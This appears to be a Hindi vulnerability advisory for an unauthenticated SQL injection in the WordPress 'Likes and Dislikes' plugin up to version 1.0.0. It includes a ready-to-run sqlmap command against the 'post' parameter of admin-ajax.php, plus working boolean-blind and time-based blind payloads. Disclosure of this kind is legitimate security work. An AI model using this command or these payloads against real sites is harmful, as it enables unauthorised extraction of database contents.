
Likes and Dislikes Plugin <= 1.0.0 - अप्रमाणित SQL इंजेक्शन
लाइक्स और डिसलाइक्स प्लगइन <= 1.0.0 - अनाधिकृत SQL इंजेक्शन
लाइक्स और डिसलाइक्स प्लगइन प्लगइन WordPress के लिए 'post' पैरामीटर के माध्यम से SQL इंजेक्शन के लिए असुरक्षित है, सभी संस्करणों में 1.0.0 तक और इसमें शामिल, उपयोगकर्ता द्वारा प्रदान किए गए पैरामीटर पर अपर्याप्त एस्केपिंग और मौजूदा SQL क्वेरी पर पर्याप्त तैयारी की कमी के कारण। यह अनाधिकृत हमलावरों को मौजूदा क्वेरी में अतिरिक्त SQL क्वेरी जोड़ने में सक्षम बनाता है जिसका उपयोग डेटाबेस से संवेदनशील जानकारी निकालने के लिए किया जा सकता है।
python3 sqlmap.py -u 'http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php' --data='action=my_likes_dislikes_action&post=1&state=dislike' --level=2 --risk=2 --dbms='MySQL' -p post --random-agent
sqlmap identified the following injection point(s) with a total of 372 HTTP(s) requests:
---
Parameter: post (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: action=my_likes_dislikes_action&post=1 AND 8197=(SELECT (CASE WHEN (8197=8197) THEN 8197 ELSE (SELECT 7036 UNION SELECT 3343) END))-- -&state=dislike
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=my_likes_dislikes_action&post=1 AND (SELECT 7318 FROM (SELECT(SLEEP(5)))OIPg)&state=dislike
---